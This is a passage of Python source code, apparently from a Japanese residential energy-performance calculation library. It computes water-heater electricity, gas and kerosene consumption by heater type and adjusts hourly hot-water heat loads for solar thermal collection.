theta_ex_d_Ave_d=theta_ex_d_Ave_d,
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t
)
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' \
or hw_type == '電気ヒートポンプ・ガス併用型給湯機(試験された値を用いる)':
return hybrid_gas_3.calc_E_E_hs_d_t(
bath_function=bath_function,
package_id=package_id,
hybrid_param=hybrid_param,
W_dash_ba1_d_t=W_dash_ba1_d_t,
theta_ex_d_Ave_d=theta_ex_d_Ave_d,
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b1_d_t=L_dashdash_b1_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba1_d_t=L_dashdash_ba1_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t
)
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return gas_hybrid.get_E_E_hs(
W_dash_k_d_t=W_dash_k_d_t,
W_dash_s_d_t=W_dash_s_d_t,
W_dash_w_d_t=W_dash_w_d_t,
W_dash_b1_d_t=W_dash_b1_d_t,
W_dash_b2_d_t=W_dash_b2_d_t,
W_dash_ba1_d_t=W_dash_ba1_d_t,
theta_ex_d_Ave_d=theta_ex_d_Ave_d,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t
)
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return whybrid.calc_E_E_hs_d_t(
L_HWH=L_HWH,
hybrid_category=hybrid_category,
theta_ex_d_Ave_d=theta_ex_d_Ave_d,
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t
)
else:
raise ValueError(hw_type)
def calc_E_G_hs_d(hw_type, hybrid_category, e_rtd, e_dash_rtd, bath_function, package_id, Theta_ex_Nave, W_dash_k_d_t, W_dash_s_d_t,
W_dash_w_d_t, W_dash_b1_d_t, W_dash_b2_d_t, W_dash_ba1_d_t, Theta_ex_Ave, L_dashdash_k_d_t,
L_dashdash_s_d_t, L_dashdash_w_d_t,
L_dashdash_b1_d_t, L_dashdash_b2_d_t, L_dashdash_ba1_d_t, L_dashdash_ba2_d_t, L_HWH, hybrid_param):
"""1日当たりの給湯機のガス消費量
Args:
hw_type(str): 給湯機/給湯温水暖房機の種類
hybrid_category(str): 電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機の区分
e_rtd(float): 当該給湯機の効率
e_dash_rtd(float): エネルギーの使用の合理化に関する法律」に基づく「特定機器の性能の向上に関する製造事業者等の 判断の基準等」(ガス温水機器)に定義される「エネルギー消費効率」
bath_function(str): ふろ機能の種類
Theta_ex_Nave(ndarray): 夜間平均外気温 (℃)
W_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯量 (L/h)
W_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯量 (L/h)
W_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯量 (L/h)
W_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯量 (L/h)
W_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯量 (L/h)
W_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯量 (L/h)
Theta_ex_Ave(ndarray): 日平均外気温度 (℃)
L_dashdash_k_d: 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_s_d: 1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_w_d: 1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b1_d: 1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b2_d: 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba1_d: 1時間当たりの浴槽水栓さし湯時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba2_d: 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
package_id: param L_dashdash_k_d_t:
L_dashdash_s_d_t: param L_dashdash_w_d_t:
L_dashdash_b1_d_t: param L_dashdash_b2_d_t:
L_dashdash_ba1_d_t: param L_dashdash_ba2_d_t:
hybrid_param: returns: 1時間当たりの給湯機のガス消費量 (MJ/h)
L_dashdash_k_d_t:
L_dashdash_w_d_t:
L_dashdash_b2_d_t:
L_dashdash_ba2_d_t:
Returns:
ndarray: 1時間当たりの給湯機のガス消費量 (MJ/h)
"""
if hw_type == 'ガス従来型給湯機' or hw_type == 'ガス従来型給湯温水暖房機' \
or hw_type == 'ガス潜熱回収型給湯機' or hw_type == 'ガス潜熱回収型給湯温水暖房機':
return gas.calc_E_G_hs_d_t(
hw_type=hw_type,
e_rtd=e_rtd,
e_dash_rtd=e_dash_rtd,
theta_ex_d_Ave_d=Theta_ex_Ave,
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b1_d_t=L_dashdash_b1_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba1_d_t=L_dashdash_ba1_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t,
bath_function=bath_function
)
elif hw_type == '石油従来型給湯機' or hw_type == '石油従来型給湯温水暖房機' \
or hw_type == '石油潜熱回収型給湯機' or hw_type == '石油潜熱回収型給湯温水暖房機':
return oil.get_E_G_hs_d_t()
elif hw_type == '電気ヒートポンプ給湯機':
return eheatpump.get_E_G_hs_d_t()
elif hw_type == '電気ヒーター給湯機' or hw_type == '電気ヒーター給湯温水暖房機':
return eheater.get_E_G_hs()
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)' \
or hw_type == '電気ヒートポンプ・ガス併用型給湯機(仕様による)':
return hybrid_gas.calc_E_G_hs_d_t(
hybrid_category=hybrid_category,
theta_ex_d_Ave_d=Theta_ex_Ave,
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t
)
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' \
or hw_type == '電気ヒートポンプ・ガス併用型給湯機(試験された値を用いる)':
return hybrid_gas_3.get_E_G_hs_d_t(
bath_function=bath_function,
package_id=package_id,
theta_ex_d_Ave_d=Theta_ex_Ave,
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b1_d_t=L_dashdash_b1_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba1_d_t=L_dashdash_ba1_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t,
W_dash_ba1_d_t=W_dash_ba1_d_t,
hybrid_param=hybrid_param
)
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return gas_hybrid.get_E_G_hs(
Theta_ex_Ave=Theta_ex_Ave,
L_dashdash_k=L_dashdash_k_d_t,
L_dashdash_s=L_dashdash_s_d_t,
L_dashdash_w=L_dashdash_w_d_t,
L_dashdash_b1=L_dashdash_b1_d_t,
L_dashdash_b2=L_dashdash_b2_d_t,
L_dashdash_ba1=L_dashdash_ba1_d_t,
L_dashdash_ba2=L_dashdash_ba2_d_t,
bath_function=bath_function
)
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return whybrid.calc_E_G_hs_d_t(
L_HWH=L_HWH,
hybrid_category=hybrid_category,
Theta_ex_Ave=Theta_ex_Ave,
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t
)
elif hw_type == 'コージェネレーションを使用する':
return np.zeros(365)
else:
raise ValueError(hw_type)
def calc_E_K_hs_d_t(hw_type, e_rtd, e_dash_rtd, bath_function, theta_ex_d_Ave_d, L_dashdash_k_d_t, L_dashdash_s_d_t,
L_dashdash_w_d_t,
L_dashdash_b1_d_t, L_dashdash_b2_d_t, L_dashdash_ba1_d_t, L_dashdash_ba2_d_t):
"""1時間当たりの給湯機の灯油消費量 (MJ/h)
Args:
hw_type(str): 給湯機/給湯温水暖房機の種類
e_rtd(float): 当該給湯機の効率
e_dash_rtd(float): エネルギーの使用の合理化に関する法律」に基づく「特定機器の性能の向上に関する製造事業者等の 判断の基準等」(ガス温水機器)に定義される「エネルギー消費効率」
bath_function(str): ふろ機能の種類
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
Returns:
ndarray: 1時間当たりの給湯機の灯油消費量 (MJ/h)
"""
if hw_type == 'ガス従来型給湯機' or hw_type == 'ガス従来型給湯温水暖房機' \
or hw_type == 'ガス潜熱回収型給湯機' or hw_type == 'ガス潜熱回収型給湯温水暖房機':
return gas.get_E_K_hs_d_t()
elif hw_type == '石油従来型給湯機' or hw_type == '石油従来型給湯温水暖房機' \
or hw_type == '石油潜熱回収型給湯機' or hw_type == '石油潜熱回収型給湯温水暖房機':
return oil.calc_E_K_hs_d_t(
hw_type=hw_type,
bath_function=bath_function,
e_rtd=e_rtd,
e_dash_rtd=e_dash_rtd,
theta_ex_d_Ave_d=theta_ex_d_Ave_d,
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b1_d_t=L_dashdash_b1_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba1_d_t=L_dashdash_ba1_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t
)
elif hw_type == '電気ヒートポンプ給湯機':
return eheatpump.get_E_K_hs_d_t()
elif hw_type == '電気ヒーター給湯機' or hw_type == '電気ヒーター給湯温水暖房機':
return eheater.get_E_K_hs()
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)' \
or hw_type == '電気ヒートポンプ・ガス併用型給湯機(仕様による)':
return gas_hybrid.get_E_K_hs()
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' \
or hw_type == '電気ヒートポンプ・ガス併用型給湯機(試験された値を用いる)':
return hybrid_gas.get_E_K_hs_d_t()
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return hybrid_gas.get_E_K_hs_d_t()
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return whybrid.get_E_K_hs_d_t()
elif hw_type == 'コージェネレーションを使用する':
return np.zeros(365)
else:
raise ValueError(hw_type)
def get_normalized_bath_function(hw_type, bath_function):
"""表4 評価可能な給湯機/給湯温水暖房機の種類
Args:
hw_type(str): 給湯機/給湯温水暖房機の種類
bath_function(str): ふろ機能の種類
Returns:
str: 評価可能な給湯機/給湯温水暖房機の種類
"""
if hw_type == 'ガス従来型給湯機' or hw_type == 'ガス従来型給湯温水暖房機' \
or hw_type == 'ガス潜熱回収型給湯機' or hw_type == 'ガス潜熱回収型給湯温水暖房機':
return bath_function
elif hw_type == '石油従来型給湯機' or hw_type == '石油従来型給湯温水暖房機' \
or hw_type == '石油潜熱回収型給湯機' or hw_type == '石油潜熱回収型給湯温水暖房機':
return bath_function
elif hw_type == '電気ヒートポンプ給湯機':
return bath_function
elif hw_type == '電気ヒーター給湯機' or hw_type == '電気ヒーター給湯温水暖房機':
return bath_function
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' \
or hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)' \
or hw_type == '電気ヒートポンプ・ガス併用型給湯機(試験された値を用いる)' \
or hw_type == '電気ヒートポンプ・ガス併用型給湯機(仕様による)':
return "ふろ給湯機(追焚あり)"
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return "ふろ給湯機(追焚あり)"
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return "ふろ給湯機(追焚あり)"
elif hw_type == 'コージェネレーションを使用する':
return bath_function
else:
raise ValueError(hw_type)
# ============================================================================
# 7. 太陽熱補正給湯熱負荷
# ============================================================================
def calc_L_dashdash_k_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t, L_dash_ba1_d_t,
L_sun_d_t):
"""1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h) (4a)
Args:
L_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯熱負荷 (MJ/h)
L_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
L_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯熱負荷 (MJ/h)
L_sun_d_t(ndarray): 1時間当たりの太陽熱利用給湯設備による補正集熱量 (MJ/h)
Returns:
ndarray: 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
"""
L_dashdash_k_d_t = np.zeros(24 * 365)
L_dash_d_t = L_dash_k_d_t + L_dash_s_d_t + L_dash_w_d_t + L_dash_b1_d_t + L_dash_b2_d_t + L_dash_ba1_d_t
f = L_dash_d_t > 0
L_dashdash_k_d_t[f] = L_dash_k_d_t[f] - L_sun_d_t[f] * (L_dash_k_d_t[f] / L_dash_d_t[f])
return L_dashdash_k_d_t
def calc_L_dashdash_s_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t, L_dash_ba1_d_t,
L_sun_d_t):
"""1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h) (4b)
Args:
L_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯熱負荷 (MJ/h)
L_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
L_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯熱負荷 (MJ/h)
L_sun_d_t(ndarray): 1時間当たりの太陽熱利用給湯設備による補正集熱量 (MJ/h)
Returns:
ndarray: 1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h)
"""
L_dashdash_s_d_t = np.zeros(24 * 365)
L_dash_d_t = L_dash_k_d_t + L_dash_s_d_t + L_dash_w_d_t + L_dash_b1_d_t + L_dash_b2_d_t + L_dash_ba1_d_t
f = L_dash_d_t > 0
L_dashdash_s_d_t[f] = L_dash_s_d_t[f] - L_sun_d_t[f] * (L_dash_s_d_t[f] / L_dash_d_t[f])
return L_dashdash_s_d_t
def calc_L_dashdash_w_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t, L_dash_ba1_d_t,
L_sun_d_t):
"""1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h) (4c)
Args:
L_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯熱負荷 (MJ/h)
L_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
L_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯熱負荷 (MJ/h)
L_sun_d_t(ndarray): 1時間当たりの太陽熱利用給湯設備による補正集熱量 (MJ/h)
Returns:
ndarray: 1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h)
"""
L_dashdash_w_d_t = np.zeros(24 * 365)
L_dash_d_t = L_dash_k_d_t + L_dash_s_d_t + L_dash_w_d_t + L_dash_b1_d_t + L_dash_b2_d_t + L_dash_ba1_d_t
f = L_dash_d_t > 0
L_dashdash_w_d_t[f] = L_dash_w_d_t[f] - L_sun_d_t[f] * (L_dash_w_d_t[f] / L_dash_d_t[f])
return L_dashdash_w_d_t
def calc_L_dashdash_b1_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t, L_dash_ba1_d_t,
L_sun_d_t):
"""1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯熱負荷 (MJ/h) (4d)
Args:
L_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯熱負荷 (MJ/h)
L_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
L_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯熱負荷 (MJ/h)
L_sun_d_t(ndarray): 1時間当たりの太陽熱利用給湯設備による補正集熱量 (MJ/h)
Returns:
ndarray: 1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯熱負荷 (MJ/h)
"""
L_dashdash_b1_d_t = np.zeros(24 * 365)
L_dash_d_t = L_dash_k_d_t + L_dash_s_d_t + L_dash_w_d_t + L_dash_b1_d_t + L_dash_b2_d_t + L_dash_ba1_d_t
f = L_dash_d_t > 0
L_dashdash_b1_d_t[f] = L_dash_b1_d_t[f] - L_sun_d_t[f] * (L_dash_b1_d_t[f] / L_dash_d_t[f])
return L_dashdash_b1_d_t
def calc_L_dashdash_b2_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t, L_dash_ba1_d_t,
L_sun_d_t):
"""1時間当たりの浴槽自動湯はり時における太陽熱補正給湯負荷 (MJ/h) (4e)
Args:
L_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯熱負荷 (MJ/h)
L_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
L_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯熱負荷 (MJ/h)
L_sun_d_t(ndarray): 1時間当たりの太陽熱利用給湯設備による補正集熱量 (MJ/h)
Returns:
ndarray: 1時間当たりの浴槽自動湯はり時における太陽熱補正給湯負荷 (MJ/h)
"""
L_dashdash_b2_d_t = np.zeros(24 * 365)
L_dash_d_t = L_dash_k_d_t + L_dash_s_d_t + L_dash_w_d_t + L_dash_b1_d_t + L_dash_b2_d_t + L_dash_ba1_d_t
f = L_dash_d_t > 0
L_dashdash_b2_d_t[f] = L_dash_b2_d_t[f] - L_sun_d_t[f] * (L_dash_b2_d_t[f] / L_dash_d_t[f])
return L_dashdash_b2_d_t
def calc_L_dashdash_ba1_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t, L_dash_ba1_d_t,
L_sun_d_t):
"""1時間当たりの浴槽水栓さし湯時における太陽熱補正給湯負荷 (MJ/h) (4f)
Args:
L_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/h)
L_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯熱負荷 (MJ/hd)
L_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
L_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯熱負荷 (MJ/h)
L_sun_d_t(ndarray): 1時間当たりの太陽熱利用給湯設備による補正集熱量 (MJ/h)
Returns:
ndarray: 1時間当たりの浴槽水栓さし湯時における太陽熱補正給湯負荷 (MJ/h)
"""
L_dashdash_ba1_d_t = np.zeros(24 * 365)
L_dash_d_t = L_dash_k_d_t + L_dash_s_d_t + L_dash_w_d_t + L_dash_b1_d_t + L_dash_b2_d_t + L_dash_ba1_d_t
f = L_dash_d_t > 0
L_dashdash_ba1_d_t[f] = L_dash_ba1_d_t[f] - L_sun_d_t[f] * (L_dash_ba1_d_t[f] / L_dash_d_t[f])
return L_dashdash_ba1_d_t
def get_L_dashdash_ba2_d_t(L_dash_ba2_d_t):
"""1時間当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/h) (4g)
Args:
L_dash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯負荷 (MJ/h)
Returns:
1時間当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/h)
"""
return L_dash_ba2_d_t
def calc_L_sun_d_t(region, sol_region=None, solar_device=None, ls_type=None, A_sp=None, P_alpha_sp=None, P_beta_sp=None,
W_tnk_ss=None, hotwater_use=None, heating_flag_d=None, A_col=None, P_alpha=None, P_beta=None,
V_fan_P0=None, d0=None,
d1=None, m_fan_test=None, W_tnk_ass=None, Theta_wtr_d=None, L_dash_k_d_t=None, L_dash_s_d_t=None,
L_dash_w_d_t=None, L_dash_b1_d_t=None, L_dash_b2_d_t=None, L_dash_ba1_d_t=None):
"""太陽熱利用給湯設備による補正集熱量
Args:
region(int): 省エネルギー地域区分
sol_region(int, optional): 年間の日射地域区分 (Default value = None)
solar_device(str, optional): 太陽熱利用設備の種類 (液体集熱式,空気集熱式,None) (Default value = None)
ls_type(str, optional): 液体集熱式太陽熱利用設備の種類 (太陽熱温水器,ソーラーシステム) (Default value = None)
A_sp(float, optional): 太陽熱集熱部の有効集熱面積 (m2) (Default value = None)
P_alpha_sp(float, optional): 太陽熱集熱部の方位角 (°) (Default value = None)
P_beta_sp(float, optional): 太陽熱集熱部の傾斜角 (°) (Default value = None)
W_tnk_ss(float, optional): ソーラーシステムのタンク容量 (L) (Default value = None)
W_tnk_ass(float, optional): タンク容量 (L) (Default value = None)
Theta_wtr_d(ndarray, optional): 日平均給水温度 (℃) (Default value = None)
L_dash_k_d_t(ndarrayL, optional): 1時間当たりの台所水栓における節湯補正給湯熱負荷 (MJ/h) (Default value = None)
L_dash_s_d_t(ndarray, optional): 1時間当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/h) (Default value = None)
L_dash_w_d_t(ndarray, optional): 1時間当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/h) (Default value = None)
L_dash_b1_d_t(ndarray, optional): 1時間当たりの浴槽水栓湯はりにおける節湯補正給湯熱負荷 (MJ/h) (Default value = None)
L_dash_b2_d_t(ndarray, optional): 1時間当たりの浴槽自動湯はりにおける節湯補正給湯熱負荷 (MJ/h) (Default value = None)
L_dash_ba1_d_t(ndarray, optional): 1時間当たりの浴槽水栓さし湯における節湯補正給湯熱負荷 (MJ/h) (Default value = None)
hotwater_use: Default value = None)
heating_flag_d: Default value = None)
A_col: Default value = None)
P_alpha: Default value = None)
P_beta: Default value = None)
V_fan_P0: Default value = None)
d0: Default value = None)
d1: Default value = None)
m_fan_test: Default value = None)
Returns:
ndarray: 1時間当たりの太陽熱利用設備による補正集熱量 (MJ/h)
"""
if solar_device == '液体集熱式':
return lss.calc_L_sun_lss_d_t(
region=region,
sol_region=sol_region,
ls_type=ls_type,
A_sp=A_sp,
P_alpha_sp=P_alpha_sp,
P_beta_sp=P_beta_sp,
W_tnk_ss=W_tnk_ss,
Theta_wtr_d=Theta_wtr_d,
L_dash_k_d_t=L_dash_k_d_t,
L_dash_s_d_t=L_dash_s_d_t,
L_dash_w_d_t=L_dash_w_d_t,
L_dash_b1_d_t=L_dash_b1_d_t,
L_dash_b2_d_t=L_dash_b2_d_t,
L_dash_ba1_d_t=L_dash_ba1_d_t
)
elif solar_device == '空気集熱式':
if hotwater_use == True:
outdoor = load_outdoor()
Theta_ex_d_t = get_Theta_ex(region, outdoor)
Theta_col_nonopg_d_t, Theta_col_opg_d_t = ass.calc_Theta_col(A_col, P_alpha, P_beta, V_fan_P0, d0, d1,
m_fan_test, region, sol_region, Theta_ex_d_t)
t_fan_d_t = ass.get_t_fan_d_t(Theta_col_nonopg_d_t, Theta_col_opg_d_t)
t_cp_d_t = ass.get_t_cp_d_t(hotwater_use, t_fan_d_t, heating_flag_d)
V_fan_d_t = ass.get_V_fan_d_t(t_fan_d_t, V_fan_P0)
Q_col_d_t = ass.get_Q_col_d_t(V_fan_d_t, Theta_col_opg_d_t, Theta_ex_d_t)
Q_d = ass.calc_Q_d(Q_col_d_t, t_cp_d_t)
L_tnk_d = ass.calc_L_tnk_d(Q_d, W_tnk_ass, Theta_wtr_d)
return ass.calc_L_sun_ass_d_t(L_tnk_d, L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t,
L_dash_b2_d_t, L_dash_ba1_d_t)
else:
return np.zeros(24 * 365)
elif solar_device is None:
return np.zeros(24 * 365)
else:
raise ValueError(solar_device)
